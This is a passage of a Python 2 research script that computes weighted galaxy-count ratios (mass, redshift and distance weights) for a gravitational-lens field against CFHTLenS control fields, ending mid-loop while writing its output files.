* pixCFHT / pixlens).value][(cellpix_x * pixCFHT / pixlens).value] == 0): # ignore objects too close to the center and masked in the lens catalogue\n #print sep\n # fix anomalouss mass values in CFHTLENS. For \"orig\" and \"samp\" the point is to avoid unnecessary reading of the catalogues\n #if (str(sys.argv[8]) == \"orig\") or (str(sys.argv[8]) == \"samp\"):\n if catfield['LP_log10_SM_MED'][0] < 0:\n if float(linemstar.split()[where-3])>0: #mass_med\n catfield['LP_log10_SM_MED'][0]=linemstar.split()[where-3]\n elif float(linemstar.split()[where-5])>0: #mass_best\n catfield['LP_log10_SM_MED'][0]=linemstar.split()[where-5]\n else:\n pos=int(np.max([catfield['Z_B'][0]/0.05, 1]))\n while (pos<69) and (float(linemstar.split()[(pos * 6) - 5])<=0):\n pos=pos+1\n catfield['LP_log10_SM_MED'][0]=linemstar.split()[(pos * 6) - 5]\n if catfield['LP_log10_SM_MED'][0]<=0:\n pos=int(np.max([catfield['Z_B'][0]/0.05, 1]))\n while (pos>1) and (float(linemstar.split()[(pos * 6) - 5])<=0):\n pos=pos-1\n catfield['LP_log10_SM_MED'][0]=linemstar.split()[(pos * 6) - 5]\n if catfield['LP_log10_SM_MED'][0]<=0:\n catfield['LP_log10_SM_MED'][0]=9\n #print \"replaced mass: \", catfield['LP_log10_SM_MED'][0]\n if (catfield['LP_log10_SM_INF'][0] < 0) or (catfield['LP_log10_SM_SUP'][0] < 0):\n catfield['LP_log10_SM_INF'][0]=catfield['LP_log10_SM_MED'][0]-0.1\n catfield['LP_log10_SM_SUP'][0]=catfield['LP_log10_SM_MED'][0]+0.1\n if catfield['Z_B'][0] <= z_s_lens:\n origfield_gal[x][y] = origfield_gal[x][y] + 1\n origfield_zweight[x][y] = origfield_zweight[x][y] + (z_s_lens * catfield['Z_B'][0]) - (catfield['Z_B'][0] * catfield['Z_B'][0])\n origfield_mass[x][y] = origfield_mass[x][y] + 10**catfield['LP_log10_SM_MED'][0]\n origfield_mass2[x][y] = origfield_mass2[x][y] + ((10**catfield['LP_log10_SM_MED'][0]) * (10**catfield['LP_log10_SM_MED'][0]))\n origfield_mass3[x][y] = origfield_mass3[x][y] + ((10**catfield['LP_log10_SM_MED'][0]) * (10**catfield['LP_log10_SM_MED'][0]) * (10**catfield['LP_log10_SM_MED'][0]))\n if (sep <= 10):\n origfield_oneoverr[x][y] = origfield_oneoverr[x][y] + 0.1\n origfield_zoverr[x][y] = origfield_zoverr[x][y] + (((z_s_lens * catfield['Z_B'][0]) - (catfield['Z_B'][0] * catfield['Z_B'][0])) / 10)\n origfield_massoverr[x][y] = origfield_massoverr[x][y] + ((10**catfield['LP_log10_SM_MED'][0]) / 10)\n origfield_mass2overr[x][y] = origfield_mass2overr[x][y] + (((10**catfield['LP_log10_SM_MED'][0]) * (10**catfield['LP_log10_SM_MED'][0])) / 10)\n origfield_mass3overr[x][y] = origfield_mass3overr[x][y] + (((10**catfield['LP_log10_SM_MED'][0]) * (10**catfield['LP_log10_SM_MED'][0]) * (10**catfield['LP_log10_SM_MED'][0])) / 10)\n origfield_zmassoverr[x][y] = origfield_zmassoverr[x][y] + (((z_s_lens * catfield['Z_B'][0]) - (catfield['Z_B'][0] * catfield['Z_B'][0])) * (10**catfield['LP_log10_SM_MED'][0]) / 10)\n origfield_zmass2overr[x][y] = origfield_zmass2overr[x][y] + (((z_s_lens * catfield['Z_B'][0]) - (catfield['Z_B'][0] * catfield['Z_B'][0])) * (10**catfield['LP_log10_SM_MED'][0]) * (10**catfield['LP_log10_SM_MED'][0]) / 10)\n else:\n origfield_oneoverr[x][y] = origfield_oneoverr[x][y] + 1. / sep\n origfield_zoverr[x][y] = origfield_zoverr[x][y] + (((z_s_lens * catfield['Z_B'][0]) - (catfield['Z_B'][0] * catfield['Z_B'][0])) / sep)\n origfield_massoverr[x][y] = origfield_massoverr[x][y] + ((10**catfield['LP_log10_SM_MED'][0]) / sep)\n origfield_mass2overr[x][y] = origfield_mass2overr[x][y] + (((10**catfield['LP_log10_SM_MED'][0]) * (10**catfield['LP_log10_SM_MED'][0])) / sep)\n origfield_mass3overr[x][y] = origfield_mass3overr[x][y] + (((10**catfield['LP_log10_SM_MED'][0]) * (10**catfield['LP_log10_SM_MED'][0]) * (10**catfield['LP_log10_SM_MED'][0])) / sep)\n origfield_zmassoverr[x][y] = origfield_zmassoverr[x][y] + (((z_s_lens * catfield['Z_B'][0]) - (catfield['Z_B'][0] * catfield['Z_B'][0])) * (10**catfield['LP_log10_SM_MED'][0]) / sep)\n origfield_zmass2overr[x][y] = origfield_zmass2overr[x][y] + (((z_s_lens * catfield['Z_B'][0]) - (catfield['Z_B'][0] * catfield['Z_B'][0])) * (10**catfield['LP_log10_SM_MED'][0]) * (10**catfield['LP_log10_SM_MED'][0]) / sep)\n \n samplesup=np.zeros(int(str(sys.argv[4])))\n sampleinf=np.zeros(int(str(sys.argv[4])))\n fracz=1-1.0*(catfield['Z_B_MAX'][0]-catfield['Z_B'][0])/(catfield['Z_B_MAX'][0]-catfield['Z_B_MIN'][0])\n fracmass=1-(1.0*(10**catfield['LP_log10_SM_SUP'][0]-10**catfield['LP_log10_SM_MED'][0])/(10**catfield['LP_log10_SM_SUP'][0]-10**catfield['LP_log10_SM_INF'][0]))\n #print \"fracmass\"\n #print fracmass\n #print catfield['LP_log10_SM_MED'][i],catfield['LP_log10_SM_SUP'][i],catfield['LP_log10_SM_INF'][i]\n\n #if str(sys.argv[8]) == \"samp\":\n if (fracz > 0) and (fracz < 1):\n samplesup=catfield['Z_B'][0]+abs(np.random.normal(0, catfield['Z_B_MAX'][0]-catfield['Z_B'][0], int(str(sys.argv[4]))))\n sampleinf=catfield['Z_B'][0]-abs(np.random.normal(0, catfield['Z_B'][0]-catfield['Z_B_MIN'][0], int(str(sys.argv[4]))))\n # no negative redshifts\n while len(sampleinf[sampleinf<0]) > 0:\n sampleinf[sampleinf<0]=catfield['Z_B'][0]-abs(np.random.normal(0, catfield['Z_B'][0]-catfield['Z_B_MIN'][0], len(sampleinf[sampleinf<0])))\n rand=np.random.random(int(str(sys.argv[4])))\n samplez=sampleinf\n samplez[np.where(rand>fracz)]=samplesup[np.where(rand>fracz)]\n #samplez[samplez<0]=0\n if (fracz <= 0) or (fracz >= 1):\n samplez=np.random.normal(catfield['Z_B_MIN'][0]+(catfield['Z_B_MAX'][0]-catfield['Z_B_MIN'][0])/2, (catfield['Z_B_MAX'][0]-catfield['Z_B_MIN'][0])/2, int(str(sys.argv[4])))\n #samplez[samplez<0]=0\n # for mass, assume gaussian distribution in log, not normal space, so I don't get things like negative mass\n if (fracmass > 0) and (fracmass < 1):\n samplesup=10**(catfield['LP_log10_SM_MED'][0]+abs(np.random.normal(0, catfield['LP_log10_SM_SUP'][0]-catfield['LP_log10_SM_MED'][0], int(str(sys.argv[4])))))\n sampleinf=10**(catfield['LP_log10_SM_MED'][0]-abs(np.random.normal(0, catfield['LP_log10_SM_MED'][0]-catfield['LP_log10_SM_INF'][0], int(str(sys.argv[4])))))\n rand=np.random.random(int(str(sys.argv[4])))\n samplemass=sampleinf\n samplemass[np.where(rand>fracmass)]=samplesup[np.where(rand>fracmass)]\n if (fracmass <= 0) or (fracmass >= 1):\n samplemass=10**np.random.normal(catfield['LP_log10_SM_INF'][0]+(catfield['LP_log10_SM_SUP'][0]-catfield['LP_log10_SM_INF'][0])/2, (catfield['LP_log10_SM_SUP'][0]-catfield['LP_log10_SM_INF'][0])/2, int(str(sys.argv[4])))\n print samplemass\n #ignore objects with z>z_source for all weights when drawing from the z PDF\n field_gal[x][y][samplez<z_s_lens] = field_gal[x][y][samplez<z_s_lens] + 1\n field_zweight[x][y][samplez<z_s_lens] = field_zweight[x][y][samplez<z_s_lens] + (z_s_lens * samplez[samplez<z_s_lens]) - (samplez[samplez<z_s_lens]**2)\n field_mass[x][y][samplez<z_s_lens] = field_mass[x][y][samplez<z_s_lens] + samplemass[samplez<z_s_lens]\n field_mass2[x][y][samplez<z_s_lens] = field_mass2[x][y][samplez<z_s_lens] + samplemass[samplez<z_s_lens]**2\n field_mass3[x][y][samplez<z_s_lens] = field_mass3[x][y][samplez<z_s_lens] + samplemass[samplez<z_s_lens]**3\n #print (catfield['Z_B_MAX'][i] - catfield['Z_B_MIN'][i])/2\n if (sep <= 10):\n field_oneoverr[x][y][samplez<z_s_lens] = field_oneoverr[x][y][samplez<z_s_lens] + 0.1\n field_zoverr[x][y][samplez<z_s_lens] = field_zoverr[x][y][samplez<z_s_lens] + (((z_s_lens * samplez[samplez<z_s_lens]) - (samplez[samplez<z_s_lens]**2)) / 10)\n field_massoverr[x][y][samplez<z_s_lens] = field_massoverr[x][y][samplez<z_s_lens] + (samplemass[samplez<z_s_lens] / 10)\n field_mass2overr[x][y][samplez<z_s_lens] = field_mass2overr[x][y][samplez<z_s_lens] + ((samplemass[samplez<z_s_lens]**2) / 10)\n field_mass3overr[x][y][samplez<z_s_lens] = field_mass3overr[x][y][samplez<z_s_lens] + ((samplemass[samplez<z_s_lens]**3) / 10)\n field_zmassoverr[x][y][samplez<z_s_lens] = field_zmassoverr[x][y][samplez<z_s_lens] + (((z_s_lens * samplez[samplez<z_s_lens]) - (samplez[samplez<z_s_lens]**2)) * samplemass[samplez<z_s_lens] / 10)\n field_zmass2overr[x][y][samplez<z_s_lens] = field_zmass2overr[x][y][samplez<z_s_lens] + (((z_s_lens * samplez[samplez<z_s_lens]) - (samplez[samplez<z_s_lens]**2)) * (samplemass[samplez<z_s_lens]**2) / 10)\n else:\n field_oneoverr[x][y][samplez<z_s_lens] = field_oneoverr[x][y][samplez<z_s_lens] + 1/sep\n field_zoverr[x][y][samplez<z_s_lens] = field_zoverr[x][y][samplez<z_s_lens] + (((z_s_lens * samplez[samplez<z_s_lens]) - (samplez[samplez<z_s_lens]**2)) / sep)\n field_massoverr[x][y][samplez<z_s_lens] = field_massoverr[x][y][samplez<z_s_lens] + (samplemass[samplez<z_s_lens] / sep)\n field_mass2overr[x][y][samplez<z_s_lens] = field_mass2overr[x][y][samplez<z_s_lens] + ((samplemass[samplez<z_s_lens]**2) / sep)\n field_mass3overr[x][y][samplez<z_s_lens] = field_mass3overr[x][y][samplez<z_s_lens] + ((samplemass[samplez<z_s_lens]**3) / sep)\n field_zmassoverr[x][y][samplez<z_s_lens] = field_zmassoverr[x][y][samplez<z_s_lens] + (((z_s_lens * samplez[samplez<z_s_lens]) - (samplez[samplez<z_s_lens]**2)) * samplemass[samplez<z_s_lens] / sep)\n field_zmass2overr[x][y][samplez<z_s_lens] = field_zmass2overr[x][y][samplez<z_s_lens] + (((z_s_lens * samplez[samplez<z_s_lens]) - (samplez[samplez<z_s_lens]**2)) * (samplemass[samplez<z_s_lens]**2) / sep)\n \n #if str(sys.argv[8]) == \"tab\":\n massbest_tab=np.zeros(70)\n massinf_tab=np.zeros(70)\n massmed_tab=np.zeros(70)\n masssup_tab=np.zeros(70)\n pdz_tab=np.zeros(70)\n for m in range(69):\n pdz_tab[m]=float(linepdz.split()[2+m][:-1]) # because the last character is comma\n if pdz_tab[m]<0.001:\n pdz_tab[m]=0\n pdz_tab[69]=float(linepdz.split()[71])\n if pdz_tab[69]<0.001:\n pdz_tab[69]=0\n for m in range(70):\n if pdz_tab[m]!=0:\n massbest_tab[m]=float(linemstar.split()[1+6*m])\n if massbest_tab[m]<0:\n massbest_tab[m]=9 # very small number of exceptions\n for m in range(70):\n if pdz_tab[m]!=0:\n massmed_tab[m]=float(linemstar.split()[3+6*m])\n if massmed_tab[m]<0:\n massmed_tab[m]=massbest_tab[m]\n massinf_tab[m]=float(linemstar.split()[2+6*m])\n masssup_tab[m]=float(linemstar.split()[4+6*m])\n if massinf_tab[m]<0:\n massinf_tab[m]=massmed_tab[m]-0.1\n if masssup_tab[m]<0:\n masssup_tab[m]=massmed_tab[m]+0.1\n #print ID,m,massbest_tab[m],massinf_tab[m],masssup_tab[m],masssup_tab[m]\n custm = stats.rv_discrete(name='custm', values=(zgridint, pdz_tab))\n sample=custm.rvs(size=int(str(sys.argv[4])))\n iter=0\n while len(sample[pdz_tab[sample]==0]) != 0: # happens because the probabilities do not sum exactly to 1; first reshuffle 10 times; if this does not solve the problem replace with the value having maximum probability; happens because the probabilities do not sum exactly to 1\n iter=iter+1\n sample=custm.rvs(size=int(str(sys.argv[4])))\n if iter==10:\n print pdz_tab,catfield['ID'][0],sample,str(sys.argv[1])\n sample[pdz_tab[sample]==0]=np.where(pdz_tab==np.max(pdz_tab[sample[pdz_tab[sample]!=0]]))[0][0]\n #print zgrid[sample],catfield['ID'][0]\n samplez=zgrid[sample]\n sample_massinf_tab=massinf_tab[sample] # since \"sample\" is constant, this insures that Mstar corresponds to z\n sample_massmed_tab=massmed_tab[sample]\n sample_masssup_tab=masssup_tab[sample]\n sample_lenssup=np.zeros(int(str(sys.argv[4])))\n sample_lensinf=np.zeros(int(str(sys.argv[4])))\n #print sample_massmed_tab, samplez, catfield['ID'][0]\n for l in range(int(str(sys.argv[4]))):\n if sample_massmed_tab[l]==0: #I SHOULD NOT HAVE TO DO THIS, THERE IS A BUG\n sample_massmed_tab[l]=9\n sample_massinf_tab[l]=8.9\n sample_masssup_tab[l]=9.1\n print \"Exception!\", catfield['ID'][0]\n sample_lenssup[l]=10**(sample_massmed_tab[l]+abs(np.random.normal(0, sample_masssup_tab[l]-sample_massmed_tab[l], 1)))\n sample_lensinf[l]=10**(sample_massmed_tab[l]-abs(np.random.normal(0, sample_massmed_tab[l]-sample_massinf_tab[l], 1)))\n rand=np.random.random(1)\n samplemass[l]=sample_lensinf[l]\n fracmass=1-(1.0*(10**sample_masssup_tab[l]-10**sample_massmed_tab[l])/(10**sample_masssup_tab[l]-10**sample_massinf_tab[l]))\n if rand>fracmass:\n samplemass[l]=sample_lenssup[l]\n #print catfield['ID'][0]\n #print zgrid[sample]\n #print samplemass[sample]\n #print massinf_tab[sample]\n #print massmed_tab[sample]\n #print masssup_tab[sample]\n #ignore objects with z>z_source for all weights when drawing from the z PDF\n tab_field_gal[x][y][samplez<z_s_lens] = tab_field_gal[x][y][samplez<z_s_lens] + 1\n tab_field_zweight[x][y][samplez<z_s_lens] = tab_field_zweight[x][y][samplez<z_s_lens] + (z_s_lens * samplez[samplez<z_s_lens]) - (samplez[samplez<z_s_lens]**2)\n tab_field_mass[x][y][samplez<z_s_lens] = tab_field_mass[x][y][samplez<z_s_lens] + samplemass[samplez<z_s_lens]\n tab_field_mass2[x][y][samplez<z_s_lens] = tab_field_mass2[x][y][samplez<z_s_lens] + samplemass[samplez<z_s_lens]**2\n tab_field_mass3[x][y][samplez<z_s_lens] = tab_field_mass3[x][y][samplez<z_s_lens] + samplemass[samplez<z_s_lens]**3\n #print (catfield['Z_B_MAX'][i] - catfield['Z_B_MIN'][i])/2\n if (sep <= 10):\n tab_field_oneoverr[x][y][samplez<z_s_lens] = tab_field_oneoverr[x][y][samplez<z_s_lens] + 0.1\n tab_field_zoverr[x][y][samplez<z_s_lens] = tab_field_zoverr[x][y][samplez<z_s_lens] + (((z_s_lens * samplez[samplez<z_s_lens]) - (samplez[samplez<z_s_lens]**2)) / 10)\n tab_field_massoverr[x][y][samplez<z_s_lens] = tab_field_massoverr[x][y][samplez<z_s_lens] + (samplemass[samplez<z_s_lens] / 10)\n tab_field_mass2overr[x][y][samplez<z_s_lens] = tab_field_mass2overr[x][y][samplez<z_s_lens] + ((samplemass[samplez<z_s_lens]**2) / 10)\n tab_field_mass3overr[x][y][samplez<z_s_lens] = tab_field_mass3overr[x][y][samplez<z_s_lens] + ((samplemass[samplez<z_s_lens]**3) / 10)\n tab_field_zmassoverr[x][y][samplez<z_s_lens] = tab_field_zmassoverr[x][y][samplez<z_s_lens] + (((z_s_lens * samplez[samplez<z_s_lens]) - (samplez[samplez<z_s_lens]**2)) * samplemass[samplez<z_s_lens] / 10)\n tab_field_zmass2overr[x][y][samplez<z_s_lens] = tab_field_zmass2overr[x][y][samplez<z_s_lens] + (((z_s_lens * samplez[samplez<z_s_lens]) - (samplez[samplez<z_s_lens]**2)) * (samplemass[samplez<z_s_lens]**2) / 10)\n else:\n tab_field_oneoverr[x][y][samplez<z_s_lens] = tab_field_oneoverr[x][y][samplez<z_s_lens] + 1/sep\n tab_field_zoverr[x][y][samplez<z_s_lens] = tab_field_zoverr[x][y][samplez<z_s_lens] + (((z_s_lens * samplez[samplez<z_s_lens]) - (samplez[samplez<z_s_lens]**2)) / sep)\n tab_field_massoverr[x][y][samplez<z_s_lens] = tab_field_massoverr[x][y][samplez<z_s_lens] + (samplemass[samplez<z_s_lens] / sep)\n tab_field_mass2overr[x][y][samplez<z_s_lens] = tab_field_mass2overr[x][y][samplez<z_s_lens] + ((samplemass[samplez<z_s_lens]**2) / sep)\n tab_field_mass3overr[x][y][samplez<z_s_lens] = tab_field_mass3overr[x][y][samplez<z_s_lens] + ((samplemass[samplez<z_s_lens]**3) / sep)\n tab_field_zmassoverr[x][y][samplez<z_s_lens] = tab_field_zmassoverr[x][y][samplez<z_s_lens] + (((z_s_lens * samplez[samplez<z_s_lens]) - (samplez[samplez<z_s_lens]**2)) * samplemass[samplez<z_s_lens] / sep)\n tab_field_zmass2overr[x][y][samplez<z_s_lens] = tab_field_zmass2overr[x][y][samplez<z_s_lens] + (((z_s_lens * samplez[samplez<z_s_lens]) - (samplez[samplez<z_s_lens]**2)) * (samplemass[samplez<z_s_lens]**2) / sep)\n\n #if str(sys.argv[8]) == \"orig\":\n origfield_mass2rms = np.sqrt(origfield_mass2)\n origfield_mass3rms = scipy.special.cbrt(origfield_mass3)\n origfield_mass2overrrms = np.sqrt(origfield_mass2overr)\n origfield_mass3overrrms = scipy.special.cbrt(origfield_mass3overr)\n #if str(sys.argv[8]) == \"samp\":\n field_mass2rms = np.sqrt(field_mass2)\n field_mass3rms = scipy.special.cbrt(field_mass3)\n field_mass2overrrms = np.sqrt(field_mass2overr)\n field_mass3overrrms = scipy.special.cbrt(field_mass3overr)\n #if str(sys.argv[8]) == \"tab\":\n tab_field_mass2rms = np.sqrt(tab_field_mass2)\n tab_field_mass3rms = scipy.special.cbrt(tab_field_mass3)\n tab_field_mass2overrrms = np.sqrt(tab_field_mass2overr)\n tab_field_mass3overrrms = scipy.special.cbrt(tab_field_mass3overr)\n\n #if str(sys.argv[8]) == \"orig\":\n origq_gal = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_oneoverr = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_zweight = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_mass = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_mass2 = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_mass3 = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_zoverr = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_massoverr = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_mass2overr = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_mass3overr = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_zmassoverr = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_zmass2overr = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_mass2rms = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_mass3rms = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_mass2overrrms = np.zeros((cells_on_a_side,cells_on_a_side))\n origq_mass3overrrms = np.zeros((cells_on_a_side,cells_on_a_side))\n #if str(sys.argv[8]) == \"samp\":\n q_gal = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_oneoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_zweight = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_mass = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_mass2 = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_mass3 = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_zoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_massoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_mass2overr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_mass3overr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_zmassoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_zmass2overr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_mass2rms = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_mass3rms = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_mass2overrrms = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n q_mass3overrrms = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n #if str(sys.argv[8]) == \"tab\":\n tab_q_gal = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_oneoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_zweight = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_mass = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_mass2 = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_mass3 = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_zoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_massoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_mass2overr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_mass3overr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_zmassoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_zmass2overr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_mass2rms = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_mass3rms = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_mass2overrrms = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_q_mass3overrrms = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n\n for i in range(cells_on_a_side):\n for j in range(cells_on_a_side):\n if maskedcell[i][j] >= 0.50: # skipping the cells with large masked area\n #if str(sys.argv[8]) == \"orig\":\n origq_gal[i][j] = gal_lensorig[i][j] * 1.0 / origfield_gal[i][j]\n origq_zweight[i][j] = zweight_lensorig[i][j] * 1.0 / origfield_zweight[i][j]\n origq_mass[i][j] = mass_lensorig[i][j] * 1.0 / origfield_mass[i][j]\n origq_mass2[i][j] = mass2_lensorig[i][j] * 1.0 / origfield_mass2[i][j]\n origq_mass3[i][j] = mass3_lensorig[i][j] * 1.0 / origfield_mass3[i][j]\n origq_oneoverr[i][j] = oneoverr_lensorig[i][j] * 1.0 / origfield_oneoverr[i][j]\n origq_zoverr[i][j] = zoverr_lensorig[i][j] * 1.0 / origfield_zoverr[i][j]\n origq_massoverr[i][j] = massoverr_lensorig[i][j] * 1.0 / origfield_massoverr[i][j]\n origq_mass2overr[i][j] = mass2overr_lensorig[i][j] * 1.0 / origfield_mass2overr[i][j]\n origq_mass3overr[i][j] = mass3overr_lensorig[i][j] * 1.0 / origfield_mass3overr[i][j]\n origq_zmassoverr[i][j] = zmassoverr_lensorig[i][j] * 1.0 / origfield_zmassoverr[i][j]\n origq_zmass2overr[i][j] = zmass2overr_lensorig[i][j] * 1.0 / origfield_zmass2overr[i][j]\n origq_mass2rms[i][j] = mass2rms_lensorig[i][j] * 1.0 / origfield_mass2rms[i][j]\n origq_mass3rms[i][j] = mass3rms_lensorig[i][j] * 1.0 / origfield_mass3rms[i][j]\n origq_mass2overrrms[i][j] = mass2overrrms_lensorig[i][j] * 1.0 / origfield_mass2overrrms[i][j]\n origq_mass3overrrms[i][j] = mass3overrrms_lensorig[i][j] * 1.0 / origfield_mass3overrrms[i][j]\n #if str(sys.argv[8]) == \"samp\":\n q_gal[i][j] = gal_lens[i][j] * 1.0 / field_gal[i][j]\n q_oneoverr[i][j] = oneoverr_lens[i][j] * 1.0 / field_oneoverr[i][j]\n q_zweight[i][j] = zweight_lens[i][j] * 1.0 / field_zweight[i][j]\n q_mass[i][j] = mass_lens[i][j] * 1.0 / field_mass[i][j]\n q_mass2[i][j] = mass2_lens[i][j] * 1.0 / field_mass2[i][j]\n q_mass3[i][j] = mass3_lens[i][j] * 1.0 / field_mass3[i][j]\n q_zoverr[i][j] = zoverr_lens[i][j] * 1.0 / field_zoverr[i][j]\n q_massoverr[i][j] = massoverr_lens[i][j] * 1.0 / field_massoverr[i][j]\n q_mass2overr[i][j] = mass2overr_lens[i][j] * 1.0 / field_mass2overr[i][j]\n q_mass3overr[i][j] = mass3overr_lens[i][j] * 1.0 / field_mass3overr[i][j]\n q_zmassoverr[i][j] = zmassoverr_lens[i][j] * 1.0 / field_zmassoverr[i][j]\n q_zmass2overr[i][j] = zmass2overr_lens[i][j] * 1.0 / field_zmass2overr[i][j]\n q_mass2rms[i][j] = mass2rms_lens[i][j] * 1.0 / field_mass2rms[i][j]\n q_mass3rms[i][j] = mass3rms_lens[i][j] * 1.0 / field_mass3rms[i][j]\n q_mass2overrrms[i][j] = mass2overrrms_lens[i][j] * 1.0 / field_mass2overrrms[i][j]\n q_mass3overrrms[i][j] = mass3overrrms_lens[i][j] * 1.0 / field_mass3overrrms[i][j]\n #if str(sys.argv[8]) == \"tab\":\n tab_q_gal[i][j] = gal_lens_tab[i][j] * 1.0 / tab_field_gal[i][j]\n tab_q_oneoverr[i][j] = oneoverr_lens_tab[i][j] * 1.0 / tab_field_oneoverr[i][j]\n tab_q_zweight[i][j] = zweight_lens_tab[i][j] * 1.0 / tab_field_zweight[i][j]\n tab_q_mass[i][j] = mass_lens_tab[i][j] * 1.0 / tab_field_mass[i][j]\n tab_q_mass2[i][j] = mass2_lens_tab[i][j] * 1.0 / tab_field_mass2[i][j]\n tab_q_mass3[i][j] = mass3_lens_tab[i][j] * 1.0 / tab_field_mass3[i][j]\n tab_q_zoverr[i][j] = zoverr_lens_tab[i][j] * 1.0 / tab_field_zoverr[i][j]\n tab_q_massoverr[i][j] = massoverr_lens_tab[i][j] * 1.0 / tab_field_massoverr[i][j]\n tab_q_mass2overr[i][j] = mass2overr_lens_tab[i][j] * 1.0 / tab_field_mass2overr[i][j]\n tab_q_mass3overr[i][j] = mass3overr_lens_tab[i][j] * 1.0 / tab_field_mass3overr[i][j]\n tab_q_zmassoverr[i][j] = zmassoverr_lens_tab[i][j] * 1.0 / tab_field_zmassoverr[i][j]\n tab_q_zmass2overr[i][j] = zmass2overr_lens_tab[i][j] * 1.0 / tab_field_zmass2overr[i][j]\n tab_q_mass2rms[i][j] = mass2rms_lens_tab[i][j] * 1.0 / tab_field_mass2rms[i][j]\n tab_q_mass3rms[i][j] = mass3rms_lens_tab[i][j] * 1.0 / tab_field_mass3rms[i][j]\n tab_q_mass2overrrms[i][j] = mass2overrrms_lens_tab[i][j] * 1.0 / tab_field_mass2overrrms[i][j]\n tab_q_mass3overrrms[i][j] = mass3overrrms_lens_tab[i][j] * 1.0 / tab_field_mass3overrrms[i][j]\n\n\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n\n print (\"No. of fields with area without mask > 75 percent & > 50 percent: %d/%d, %d/%d\" % ((maskedcell>=0.75).sum(), cells_on_a_side ** 2, (maskedcell>=0.50).sum(), cells_on_a_side ** 2))\n\n# write a file where the most probable value of z and Mstar has been used, and a file for each of the 100 or 1000 samples\n address=\"/Volumes/G-RAIDStudio/CFHTlens/forhistograms\"\n f = open('%s/%s_%s_q50_orig_size%s_i%s_%s.lst' % (address,[d[38:len(listfields[0])-1] for d in listfields][count],str(sys.argv[1]),str(sys.argv[5]),str(sys.argv[6]),str(sys.argv[7])),'w')\n #if str(sys.argv[8]) == \"samp\":\n g = open('%s/%s_%s_q50_samp_size%s_i%s_%s.lst' % (address,[d[38:len(listfields[0])-1] for d in listfields][count],str(sys.argv[1]),str(sys.argv[5]),str(sys.argv[6]),str(sys.argv[7])),'w')\n #if str(sys.argv[8]) == \"tab\":\n h = open('%s/%s_%s_q50_tab_size%s_i%s_%s.lst' % (address,[d[38:len(listfields[0])-1] for d in listfields][count],str(sys.argv[1]),str(sys.argv[5]),str(sys.argv[6]),str(sys.argv[7])),'w')\n for i in range(cells_on_a_side):\n for j in range(cells_on_a_side):\n if maskedcell[i][j] >= 0.50:\n f.write('q_gal= %.4e q_oneoverr= %.4e q_zweight= %.4e q_mass= %.4e q_mass2= %.4e q_mass2rms= %.4e q_mass3= %.4e q_mass3rms= %.4e q_zoverr= %.4e q_massoverr= %.4e q_mass2overr= %.4e q_mass3overr= %.4e q_mass2overrrms= %.4e q_mass3overrrms= %.4e q_zmassoverr= %.4e q_zmass2overr= %.4e \\n' % (origq_gal[i][j], origq_oneoverr[i][j], origq_zweight[i][j], origq_mass[i][j], origq_mass2[i][j], origq_mass2rms[i][j], origq_mass3[i][j], origq_mass3rms[i][j], origq_zoverr[i][j], origq_massoverr[i][j], origq_mass2overr[i][j], origq_mass3overr[i][j], origq_mass2overrrms[i][j], origq_mass3overrrms[i][j], origq_zmassoverr[i][j], origq_zmass2overr[i][j]))\n for k in 